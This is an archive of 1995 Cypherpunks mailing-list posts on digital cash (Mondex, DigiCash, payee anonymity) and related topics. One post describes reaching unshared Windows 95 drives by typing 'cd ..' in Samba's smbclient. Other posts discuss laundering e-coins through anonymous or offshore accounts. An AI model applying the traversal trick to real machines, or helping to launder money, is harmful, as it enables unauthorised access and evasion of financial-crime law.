Subject: Re: Mondex vs. Digicash (was: Godzilla vs. Mothra)
Message-ID: <v03003701acb03ca16f26@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 22.10.95, Douglas Barnes wrote:

>   If the Digicash system allows people to set up their
>   accounts without getting out of their chairs (which I suspect will
>   be the case, if they do it right), it will initially get more
>   adopters.

Agreed, especially since it's going to be a while until Mondex, NetBill
et al are accessible by consumers outside of the trial areas.

I wonder whether this DigiCash announcement will be a limited trial or
a full-blown deployment.

>   I know at least one group of people who believe they have a good line
>   on a serious security problem in Mondex.

Mondex is definitely practicing security by obscurity. Tim Jones,
Mondex's CEO, was very cagey last week at the e-commerce conference
about how transaction mechanics and where various public and private
keys reside. I have serious questions about some aspects of Mondex's
security.

> o Even if the Mondex hardware were given away for free, think how
>   much fun it is for the average user to add a new piece of hardware
>   to their machines... ever install a sound card and CD-ROM drive on
>   a PC? I remember reading something like 20% of all "multimedia"
>   kits were returned, largely due to user install problems. If there
>   is a competing method that costs the same and _doesn't_ require
>   the hardware, people will tend go with this.

Depends on the hardware. I recently saw a pamphlet for a mag-stripe +
smart card reader with a numeric keyboard for PIN entry that plugs into
a PC as a bump in the wire between the keyboard and the CPU. The
company is in Arizona; I can't recall the name offhand.

Adding smart card capability to a PC is not in the same league of user
hassle as a multimedia upgrade. It's also much cheaper.

>   but if you explain that the money uses existing (auditable)
>   channels going in, and existing (auditable) channels going out, and
>   that only spenders are anonymous, they relax considerably. They may
>   change their minds later, but we're about to get an existence proof.

The problem is with peer-to-peer transactions that don't go through a
bank. Mondex claims that such transactions are anonymous and unaudited.
What would stop someone from moving a 500 pound per-card maximum from
one card to the next and then back up into the system elsewhere? I'm
under the impression that Mondex's value isn't serialized the way
DigiCash's is, so you can't track the value itself. And if the cards
themselves keep no records of transactions made with peer devices,
tracking seems rather tricky.

>   how can you be so sure that Mondex will win over
>   Digicash, and that they won't co-exist like, say, money orders,
>   currency and cashier's checks (three instruments with both similar
>   and dissimilar attirbutes)?

The different schemes have enough overlap that it's not clear to me
that a single bank will want to support multiple as yet untried
systems. Admittedly, we haven't yet seen which bank is working with
DigiCash, but Mondex has some pretty heavy hitters behind it already.
Since DigiCash is Internet-focused and Mondex is a non-net-specific
system that can be adapted for use over the Net, it seems to me that a
bank adopting Mondex would get more out of its investment than if it
bought into DigiCash. Banks are going to get into some kind of e-cash
system sooner than later, and Mondex seems to be the farthest along.

_______________________________________________________________________
Stephan Somogyi               Senior Editor               Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 22 Oct 95 16:09:26 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: airport security
In-Reply-To: <acaf1d35530210046717@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.951022185941.11657A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> The recent push is certainly associated with the various terrorist threats

   Furthermore, the terrorism the West faces, is state-sponsored. Neither 
of its patrons - the Russians and the Radical Arabs - are stupid. If the 
airlines become secured, they _will_ target the Greyhounds.

One need only examine US policy towards (just as one example) Turkey in 
the last five years, to realize that the Washington Elites are not 
capable of understanding fundamental problems of statescraft and 
diplomacy. Under this regime, it is no wonder that our reaction to terror 
tactics, is to react in a defensive mode - expensive airport security 
measures, etc, etc. The other side *has already won* the terror war, 
merely by virtue of having set the agenda, and making us spin in tighter 
and tighter circles - reacting, not initiating.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 22 Oct 95 16:17:17 PDT
To: attila <attila@primenet.com>
Subject: Re: airport security
In-Reply-To: <Pine.BSD.3.91.951022120147.4986A-100000@usr4.primenet.com>
Message-ID: <Pine.SV4.3.91.951022191152.11657C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


>  I have been foregoing the 
> IRS deductions for my 5 children since I refuse to obtain SSNs for them. 

    You need a better lawyer. You do have a statutory right to those
deductions, and the IRS administrative policies do yield to statutory law.

HInt: IRS can write anything it wants, in "instructions for Form XXXX" -
these leaflets do not have force of law. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: farber@central.cis.upenn.edu (David Farber)
Date: Sun, 22 Oct 95 16:24:22 PDT
To: Alan Horowitz <tcmay@got.net>
Subject: Re: airport security
Message-ID: <v02140310acb082c93d4e@[130.91.88.102]>
MIME-Version: 1.0
Content-Type: text/plain


Ever think that the one real payoff for the ID at airports
is to kill the market for re-sold frequent flyer
certificates and partially used tichets that then get sold
to others (like at most schools)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 22 Oct 95 19:53:46 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
Message-ID: <199510230252.TAA08620@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:46 AM 10/22/95 -0400, MDresser@aol.com wrote:
> Generalizing about
> reporters is about as intellectually valid as generalizing about hackers.

On the contrary:  Hackers are self selected, and so are 
very diverse.

Reporters are selected from above by an incestuous elite who 
have their hands in each others pockets, and so are very homogenous.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 22 Oct 95 18:45:02 PDT
To: ecm@ai.mit.edu
Subject: hot news at DigiCash
Message-ID: <199510230144.TAA00341@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hot news at DigiCash.  One, a real live bank is going to be issuing
Ecash denominated in U.S. dollars.  See "http://www.digicash.com/" and
"http://www.marktwain.com/".


Two, the one million trial cyberbucks have been issued and no more 
will be issued, although the First Digital Bank will continue to 
run the trial for now.  In honor of the occasion I hereby offer


E=100 US=$8.00 SELL-OFFER "Sun Oct 22 19:34:28 MDT 1995" 2 bryce@colorado.edu


Pretty soon we'll be able to exchange First Digital Bank trial 
cyberbucks for Mark Twain Bank cyberbucks denominated in U.S. Dollars.
I wonder if our trial cyberbucks will be considered collector's items?
I know that I will always be proud of *mine*...


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIrzb/WZSllhfG25AQEGNAQApa3hQlc7jWZBIzsSUqh4o6LQfhoCPzaJ
dEOHWDTS+1L8IyNo1PS3Z0hZNeDDiGda7PsilwLouH6M8kUtD7BFXyU/31QDZnXq
oLdiq/OJ3A5U04ElEtRXRn7m0eQtoPv4V41UkR0GGkLx93DyGPC6ecXX4vE14oKq
jLc4Dt296gc=
=gnEm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Sun, 22 Oct 95 16:54:17 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <yDDeDD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alan Horowitz <alanh@infi.net> writes:

> measures, etc, etc. The other side *has already won* the terror war, 
> merely by virtue of having set the agenda, and making us spin in tighter 
> and tighter circles - reacting, not initiating.

What, then?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMIrYyN74r4kaz3mVAQFI4AP/ZDZnldBk7lG3lgIScGIlWJIK8LjiYB7R
OXo0gm4zHfQ610puxnBcfq/BQdDJ7DvDW6RegZXonZedNJbvMVWwpttvZW608Rve
v9+pUgrjsbQ7QC8RbyKSKAqyjTo7fjjoNVt5NvcL27OVs9ORC5yKEeeWaPtRoQ6V
3MjZqThCmHI=
=JS0t
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 22 Oct 95 19:55:36 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510222320.RAA27764@nagina.cs.colorado.edu>
Message-ID: <199510230253.TAA08888@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bryce <wilcoxb@nagina.cs.colorado.edu> writes:
>In an on-line clearing e-cash scheme, Chaum's "double-spender
>identifier" fields are unnecessary, but a "serial number" type field
>to uniquely identify the e-coin is still necessary.  Using blinding,
>this serial number may be unknown to the bank, but it will be known
>to the payer.  If the payer and the bank are collaborating to
>identify the payee, then they can simply use this serial number to
>identify the recipient of the coin.
>
>Is there a scheme which will prevent this collusive payee 
>identification, and if so where can I read about it?  (On-line is 
>preferable of course, but I don't expect to be that fortunate.)

One proposal I have seen here is to have a "coin changer" service which
turns the received coin in at the bank for you. Then the payer and the
bank and the coin changer all have to collude to identify you.  However
you have to trust the coin changer not to steal your money.  So it better
be a pretty trustworthy organization.

>Now even if it were the case that the payee is always identifiable
>by a collusion of the bank and the payer (such as is the case in
>DigiCash Ecash), all this means is that you shouldn't accept a coin
>using one nym, and deposit it in the bank using another.  You need
>one bank account per nym, as well as one bank account per
>anonymous transaction, and then you have complete control over
>revelation of your identit(y/ies).

It would still be less than perfect to have all of a given nym's
transactions known.  In an ideal electronic cash system no transactions
are linkable if the participants don't want it.

>I can imagine a future in which this requirement is not difficult to
>meet.  Perhaps it will be the case that you can accept a coin, open
>up a new ("anonymous") account with the bank, deposit the coin, 
>withdraw a new coin of the same amount, close the account, and now 
>have an untraceable coin all in a fraction of a second.

In such a system you don't need an "account" as such, but rather the bank
simply allows used cash to be checked and exchanged for fresh cash via
anonymous connections.  This would be the most privacy-protecting system.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Oct 95 19:51:48 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
Message-ID: <acb0502856021004848f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 PM 10/22/95, Bryce wrote:

>I can imagine a future in which this requirement is not difficult to
>meet.  Perhaps it will be the case that you can accept a coin, open
>up a new ("anonymous") account with the bank, deposit the coin,
>withdraw a new coin of the same amount, close the account, and now
>have an untraceable coin all in a fraction of a second.

Bryce, we'll make you a believer in online clearing yet!

This is essentially the point several of us have been making, that if
"anonymous bank accounts" are allowed (_technically_, no problem), then Bob
can take his "possibly watched" piece of cash, deposit it with his bank in
his anonymous account, withdraw the same amount (or more, or less, it
doesn't matter if the account is truly anonymous) and neither Alice nor the
Bank know who got it.

As you note, Bob can even open a new account, deposit, withdraw, close the
account. This makes the bank a "digital coin laundry," such as Lucky Greene
and others have talked about.

If forbidden by law in the U.S., no problem using offshore banks.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 22 Oct 95 20:12:26 PDT
To: hallyn@cs.hope.edu
Subject: Re: textbooks
Message-ID: <9510230308.AA00605@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Good suggestions all, but don't forget "Network Security Private Communication
in a PUBLIC World" by Kaufman, Perlman and Speciner.  This book covers a lot
of great stuff.  It doesn't use complicated math when not required, and explains
the math very clearly when it's needed.  It explains DES and IDEA well enough
in plain language that you can understand how to implement them.  While I love
Bruce's book, it's much harder to understand than NSPC.  I highly recommend
this book to everyone.  I don't think any crypto library would be complete 
without it.  It's in contention for the official bible of crypto along with
Bruce's book.

Patrick

> From: "Dana W. Albrecht" <dwa@corsair.com>
>  
> I also suggest "A Course in Number Theory and Cryptography, 2nd Edition"
> by Neal Koblitz, published by Springer Verlag.
> 
> "Applied Cryptography" is certainly the book of choice, but Koblitz
> is an excellent secondary reference for covering a lot of the relevant
> mathematics in more depth.
> 
> In my opinion, "Applied Cryptography" was written from the perspective
> of computer science, "The Codebreakers" was written from the perspective
> of history, and Koblitz's book was written from the perspective of
> mathematics.
> 
> They are all nicely complementary.
> 
> Dana W. Albrecht
> dwa@corsair.com
> 
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Sun, 22 Oct 95 17:14:16 PDT
To: blake@io.org (Blake Harris)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <Zhchw8RRq4nf084yn@io.org>
Message-ID: <199510230013.UAA00605@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> > 	I completely agree that the reporters on this list make things
> > very difficult and people do need to be very careful about posting
> > things which will get misinterpreted by reporters.. but--

Blake writes..
> Folks:
> 
> Don't lose heart completely that your discussions on this list are
> not being read carefully by some of the media. As a case in point, I'm a
> freelance magazine writer who has been lurking on this list for at least 6
> months (although I do get behind at times due to the volume). My reason

I've been on this list almost since it start.. and in that time I've become
a freelance writer.. as have other more well known list members..

I think the thing to understand is that there is always room for
misinterpretation.. by reporters and by our own flames (if the list
traffic is any judge..)...

To speculate further on the human condition would be off topic..but
it's clear the Cypherpunks is a very valuable thing to many people for
many reason and I think (from the point of self interest) to all of
society..

/hawk

Harry Hawk
habs@panix.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Oct 95 20:03:03 PDT
To: cypherpunks@toad.com
Subject: (Fwd) DIGITAL CASH IN AN ELECTRONIC WORLD
Message-ID: <acb0542e59021004766b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I saw this on the Cyberia list. Those of you near Washington, D.C. may find
this worth attending.

By the way, one of the speakers, Kawika Daguio, was once on this list (and
may still be, though I haven't seen posts from him in a while).

--Tim May



>Date: Sun, 22 Oct 1995 17:04:32 -0400
>Errors-To: thardy@mail.wm.edu
>Reply-To: cyberia-l@warthog.cc.wm.edu
>Originator: cyberia-l@listserv.cc.wm.edu
>Sender: cyberia-l@warthog.cc.wm.edu
>Precedence: bulk
>From: "Cleveland Thornton" <thornton@legalbits.com>
>To: Multiple recipients of list <cyberia-l@warthog.cc.wm.edu>
>Subject: (Fwd) DIGITAL CASH IN AN ELECTRONIC WORLD
>X-Listserver-Version: 6.0 -- UNIX ListServer by Anastasios Kotsikonas
>
>
>For those in the Washington, DC area, you may find the following
>meeting of interest,
>
>
>
>------- Forwarded Message Follows -------
>Date:          Sat, 21 Oct 1995 21:54:36 -0400 (EDT)
>From:          Andrew Grosso <agrosso@access.digex.net>
>To:            Cleveland Thornton <cthornto>
>Subject:       Please Post
>
>                THE FUTURE OF MONEY:
>       DIGITAL CASH IN AN ELECTRONIC WORLD
>
>        The evolution of money has now completed
>a one hundred eighty degree turn from the point
>where our economy began: from a barter marketplace;
>to paper currency; and, today, to pure information
>exchanged globally over telecommunications lines.
>Money is digital, and can be created, utilized,
>and transmitted by individuals and companies, as
>well as by governments.
>
>        On Thursday, November 2, at noon, the
>Computer Crime Subcommittee of the ABA will host
>a luncheon program which will examine the birth
>and promise of digital cash.  The speakers repre-
>sent all three of the important organizations
>participating in this venture: designers, bankers,
>and governments:
>
>Steve Crocker, Vice President in Charge of Develop-
>ment, CyberCash, Inc.  CyberCash is a Reston,
>Virginia, based company which was established in
>1994.  It is in the forefront of the development
>and implementation of digital cash in the global
>marketplace.  Dr. Crocker is himself involved in
>both the technical and regulatory aspects of this
>field.  His talk will include a description of just
>what digital cash is, and how we can expect it will
>be used in the future.
>
>Kawika Daguio, Federal Representative for Operations,
>Retail Banking, and Risk Management, American
>Bankers Association: Mr. Daguio represents the
>banking industry, and will discussed its concerns
>and hopes for the new currency, and how it expects
>that digital cash will change the industry.
>
>Stephen Kroll, Chief Counsel, Financial Crimes
>Enforcement Network: Mr. Kroll's agency is primarily
>concerned with the identification of money laundering
>and other violations of federal laws concerning the
>flow of money.  He will discuss the government's
>concerns over the effects digital cash will have on
>those laws, and how governments may seek to protect
>their currencies and their sovereignty.
>
>        The program will be in the form of a brown
>bag luncheon, and will take place at the ABA Criminal
>Justice Section's Washington offices, at 740 15th
>Street, N.W., Tenth Floor.  The program is free.
>For those who wish to order a brown bag lunch to be
>provided by the ABA, the cost is $11.50, which must
>be ordered beforehand and paid for at the time it is
>picked up.  (No cash accepted; make check payable
>to ABA Criminal Justice Section.)
>
>        For reservations, please contact Mable
>Muldrow, at (202) 662-1520.  For more information,
>contact the program's co-moderators, Andrew Grosso,
>Chair of the ABA Computer Crime Subcommittee, at
>(202) 663-9041 [E-Mail: agrosso@acm.org], and
>Daryl Jackson, Vice Chair of the ABA White Collar
>Crime Committee, at (202) 942-5000.
>__________________________________________________________
>Cleveland Thornton            202-543-9673 (Office)
>Attorney at Law               202-543-3482 (Fax)
>15 Second Street, N.E.        74746.1422@compuserve.com
>Washington, D.C. 20002-7301        thornton@legalbits.com
>
>HomePage http://www.clark.net/pub/cthornto/home.html
>__________________________________________________________
>
>
>__________________________________________________________
>Cleveland Thornton            202-543-9673 (Office)
>Attorney at Law               202-543-3482 (Fax)
>15 Second Street, N.E.        74746.1422@compuserve.com
>Washington, D.C. 20002-7301        thornton@legalbits.com
>
>HomePage http://www.clark.net/pub/cthornto/home.html
>__________________________________________________________
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 22 Oct 95 20:50:46 PDT
To: cypherpunks@toad.com
Subject: Digicash for-real announcement
Message-ID: <v02120d03acb0cf23ff9a@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



(Finally, not just a "wait around" announcement)
http://www.marktwain.com/ecash.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frosty  <sotmesc@datasync.com>
Date: Mon, 23 Oct 95 01:06:28 PDT
To: proff@suburbia.apana.org.au
Subject: CSP
Message-ID: <199510230156.UAA09239@osh1.datasync.com>
MIME-Version: 1.0
Content-Type: text/plain



Frosty :::

AT&T ACCUSED OF DEFRAUDING !!!

     New York - AT&T Corp. is accused in a lawsuit of cheating millions of
residential long-distance customers out of billions of dollars by rounding
off calls to the next full minute.

     The Lawsuit, filed Thursday in state Supreme Court, claims AT&T
residential calls are billed in full minutes, meaning a call lasting one
minute and one second would be billed as a two-minute call.

     Business customers, on the other hand, are billed in six-second
intervals, meaning a one-minute, one-second call would be billed as
one minute, six seconds, the lawsuit claims.

-The Associated Press
-The Sun Herlad
- 21 Oct 1995


* sotmesc@datasync.com    aka ---* Frosty, ilKhan of the SotMESC
* To send a submission, use this address with 'CSP' in the Subject line
* Thanks to: Voyager, 2600, LOD, Knight Lightning for supporting us
* Finger SotMESC or http://www.datasync.com/~sotmesc/sotmesc.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Sun, 22 Oct 95 21:27:01 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Reducing the Flames, Attacks, and Nit-Pickings
Message-ID: <v02110104acb0c8af0a3c@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


>At 2:18 AM 10/22/95, Todd Glassey wrote:
>
>>As an aside - What blows my mind is the number of cycles people spend
>>bitching and moaning about Java itself rather than working to create a
>>better solution.


My apologies, I should have taken this off-line with Dr. Fred. I did in my
response to him as I had some personal commentary to add which would have
beebn inappropriate to the list in general.


But you are right. These lists are meant for us to exchange important
information and technologies, not necessarily commentary as to what a piece
of merde" something is.

I respect Dr' Fred's commentary and others where there is a "prize" for all
of us, but so much of the postings now happening seem to be of little
technical value.


Again I aploogize to all and to you Dr. Fred for posting my response to
your statement to the world...


>
>
>The recent flames and attacks are pretty typical of mailing lists,
>especially mailing lists having 1200 highly-opinionated subscribers
>(gulp!). Not that I like the flames, but they're not the problem I want to
>really talk about.
>
>A trend that bothers me--and others too, from comments here--is the intense
>"feeding frenzy" that is going on with each and every new product, from
>Netscape, to Microsoft Network, to Java, to Digicash.
>
>Don't get me wrong--finding flaws is a useful thing to do. But this list is
>becoming _consumed_ by the _process_ of attacking products. Worse, many of
>the attacks are by innuendo, by rumors and speculations about what features
>a product has.
>
>My comments will likely vanish without a trace, but I urge folks to hold
>back a bit on jumping in with attacks and reports of problems. Be sure
>something is _really_ a flaw before sounding the alarms.
>
>--Tim May
>
>Views here are not the views of my Internet Service Provider or Government.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>Corralitos, CA              | knowledge, reputations, information markets,
>Higher Power: 2^756839      | black markets, collapse of governments.
>"National borders are just speed bumps on the information superhighway."

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 22 Oct 95 21:42:41 PDT
To: High Society List <cypherpunks@toad.com>
Subject: Re: WinNews Special Issue (fwd)
In-Reply-To: <Pine.OSF.3.91.951021053719.24988A-100000@nic.wat.hookup.net>
Message-ID: <Pine.ULT.3.91.951022212659.1123A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Oct 1995, Tim Philp wrote:

> I am on a Microsoft mailing list that is for developers of Win95 stuff. 
> Today I found this in my mailbox. This file details a security bug in 
> Win95 that I thought might be interesting to the group.
> Regards, 
> 
> Tim Philp
> Brantford, Ontario,
> Canada
...
> ---------- Forwarded message ----------
> Date: Fri, 20 Oct 1995 17:15:33 -0700
> From: WinNews@Microsoft.com
> To: WinNews@microsoft.nwnet.com
> Subject: WinNews Special Issue
> 
> UPDATED DRIVERS FOR WINDOWS 95 FILE AND PRINTER SHARING 
> SECURITY ISSUE - October 20, 1995
> 
> Microsoft wants its customers to know that it has
> discovered and fixed a potential security problem with file
> and printer sharing in Windows 95.  Only customers who have

What a fucking joke. The Samba development community told Microsoft about
this in *January*. Microsoft's fix for the same problem in Windows for
Workgroups is dated September 28. 

> enabled file and printer sharing - a non-default option -
> may have been at risk, and, to the best of our knowledge,
> no users have been harmed.

They must not have asked anybody, then.

> What are the issues? 
> File and Printer Sharing for NetWare Networks
> 
> Microsoft was recently made aware of an issue with File
> and Printer sharing for NetWare Networks which may affect
> data security for corporate users.
> 
> Only users whose environments meet both of the following
> conditions may be affected:
> 
>     1. They configure their machine to share files and
>         printers with other users on the network using File
>         and Printer Sharing for NetWare networks (This
>         option is not turned on by default)
>     2. They enable remote administration or install
>         Microsoft Remote Registry Services  (These options
>         are not turned on by default)

#2 is not actually required.

> If your configuration matches that listed above, it is
> possible for another user on the network to gain read-only
> access to your machine after the administrator has logged
> off the machine and until you restart your computer.  To
> correct this problem, Microsoft has issued an updated
> driver for File and Printer Sharing for NetWare Networks.
> The updated driver ensures that only valid administrators
> have access to the computer's drive.

Good for them.

Microsoft is also investigating a bug where you can map whole unshared
drives over IPX or SMB. Maybe they'll acknowledge the problem in February.

> File and Printer Sharing for Microsoft Networks (not MSN:
>     The Microsoft Network online service)
> 
> Microsoft is also issuing an update for a known problem
> with File and Printer Sharing for Microsoft Networks and a
> certain UNIX shareware network client (Samba's SMBCLIENT).
> The update corrects a problem with share-level security
> documented in the Microsoft Knowledge Base on October 9th.

This is incorrect. The acknowledgement of the bug, which was pointed out
to Microsoft in January, was not available until October 12. 

> The Samba SMB client allows its users to send illegal
> networking commands over the network. The Samba client is
> the only known SMB client at this time that does not filter
> out such illegal commands.  SMBCLIENT users do not
> automatically have access to the Windows 95 drive, and
> must know the exact steps to send these illegal commands.

I wonder what illegal commands they're talking about. All you have to do 
is "cd ..". The problem is that Microsoft assumed that anyone using SMB 
was mapping a drive on a WinTel box, and thus couldn't cd below root. They
provided no mechanism on the server end to ensure that this didn't 
happen.

The problem was not limited to SMB over TCP/IP; Samba was merely the only 
radily available software to (inadvertently) expose the problem.

> The updated driver prevents these illegal commands from
> being executed, preventing SMBCLIENT users from accessing
> the drive on which sharing is enabled.  With the updated
> driver, the SMBCLIENT user will only have access to those
> shared folders that the Windows 95 user has designated.

What a novel security feature. I am so glad that Microsoft came up with this.

> How do I get the Updated Drivers?
> (Please note that this only affects English language 
> versions of Windows 95.) 

Yup, they won't install on other language versions. So they're still 
vulnerable.

> Both drivers are available for immediate download from the
> Internet (http://www.microsoft.com/windows), The Microsoft

Specifically, http://www.microsoft.com/windows/software/updates.htm.

> Microsoft is committed to providing safe connectivity
> solutions for customers.  Microsoft takes this
> responsibility seriously and has worked, and will continue
> to work, with great speed to provide solutions for
> customer issues.   

Yes. Tell them about a huge, stoopid bug in January, and they will
acknowledge the bug in mid-October. In the meantime, they will directly 
lie to the press and users about it.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 22 Oct 95 20:49:04 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <acb0502856021004848f@[205.199.118.202]>
Message-ID: <199510230348.VAA02972@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 I, Bryce <bryce@colorado.edu> wrote:
> 
> I can imagine a future in which this requirement is not difficult to
> meet.  Perhaps it will be the case that you can accept a coin, open
> up a new ("anonymous") account with the bank, deposit the coin,
> withdraw a new coin of the same amount, close the account, and now
> have an untraceable coin all in a fraction of a second.


 the entity calling itself TC May <tcmay@got.net> allegedly wrote:
> 
> This is essentially the point several of us have been making, that if
> "anonymous bank accounts" are allowed (_technically_, no problem), then Bob
> can take his "possibly watched" piece of cash, deposit it with his bank in
> his anonymous account, withdraw the same amount (or more, or less, it
> doesn't matter if the account is truly anonymous) and neither Alice nor the
> Bank know who got it.


Now it seems to me that any ecash scheme, whether cleared on-line or
off-line, with or without double-spending-detection, will put the
payee at risk of identification by a collusion of the payer and the
bank.  As far as I can tell, Chaum's off-line,
double-spending-detecting DigiCash Ecash is no more or less
susceptible to this attack than is any other scheme.  (This is
because the e-coin must have a unique ID or serial number, and the
payer/bank collusion can trace the passage of that serial number to
identify the payee.)


TC May has stated that Chaum's off-line strategy enables
payee-identification by a payer/bank collusion, but it seems to me 
that this is incorrect, because payee-identification is *always*
possible by a payer/bank collusion under any scheme.


 ""TC May"":
> As you note, Bob can even open a new account, deposit, withdraw, close the
> account. This makes the bank a "digital coin laundry," such as Lucky Greene
> and others have talked about.


Right, if the bank allows anon accounts and/or accounts that can be
created and used with very little time/effort/expense.  Now if the
bank doesn't allow that then you could have a chain of
money-laudering "remailer" type services.  They will deposit the
coin for you and withdraw a new one, thus making it untraceable
*unless* they themselves are in on the collusion.


Perhaps you "chained remailer" people can apply your expertise to this
and invent for us a method of laundering your e-coin through a chain
of such services, making sure that a collusion of payer, bank and
*all* launderers is necessary to reveal your identity, and making
sure that the launderers themselves can't steal your coin.


Sounds impossible at first blush.


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIsPyvWZSllhfG25AQHwcAP/RJpn7M3xKPcTlBNapSVLzst40dla4qkZ
2tVVdqkFqRR2JWZXdaZv9IRJTroRmPN9gwu2nigA9KkOLfUsGXYZuMsJwfsnp5O0
aOarOFPntNFPkThOPUlzAUEECVKDUFAuChYiuThli8izbq+oWlKb83yE5uRxRI/7
T7a38Bebn7c=
=2YuJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@networking.stanford.edu (Rich Graves)
